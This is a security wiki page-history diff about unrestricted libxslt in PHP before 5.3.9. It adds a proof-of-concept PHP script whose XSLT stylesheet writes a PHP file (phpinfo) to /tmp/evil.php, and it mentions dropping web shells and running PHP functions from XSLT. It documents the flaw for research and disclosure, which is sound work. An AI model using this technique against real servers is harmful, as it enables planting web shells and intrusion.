Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29
From version Icon 5.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:34
Change comment: Deletion of attachment create-file-via-libxslt.php
To version Icon 7.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:42
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -4,7 +4,13 @@
4 4  
5 5  == Creating files ==
6 6  
7 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create / overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
7 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
8 8  
9 9  
10 10  The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/.
11 +
12 +== Executing PHP code ==
13 +
14 +A call to [[registerPHPFunctions()>>http://php.net/manual/en/xsltprocessor.registerphpfunctions.php]] allows to execute standard PHP functions directly from the XSLT stylesheet.
15 +
16 +
Icon create-file-via-libxslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +601 bytes
Content
... ... @@ -1,0 +1,33 @@
1 +<?php
2 +
3 +$sXml = '<empty/>';
4 +
5 +$sXsl = <<<EOT
6 +<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
7 +
8 + <xsl:template match="/">
9 + <xsl:document href="/tmp/evil.php" method="text">
10 + <xsl:text><![CDATA[<?php phpinfo() ?>]]></xsl:text>
11 + </xsl:document>
12 + </xsl:template>
13 +
14 +</xsl:stylesheet>
15 +EOT;
16 +
17 +# LOAD XML FILE
18 +$XML = new DOMDocument();
19 +$XML->loadXML( $sXml );
20 +
21 +# LOAD XSLT FILE
22 +$XSL = new DOMDocument();
23 +$XSL->loadXML( $sXsl );
24 +
25 +# START XSLT
26 +$xslt = new XSLTProcessor();
27 +$xslt->importStylesheet( $XSL );
28 +
29 +# TRASNFORM & PRINT
30 +print $xslt->transformToXML( $XML );
31 +
32 +?>
33 +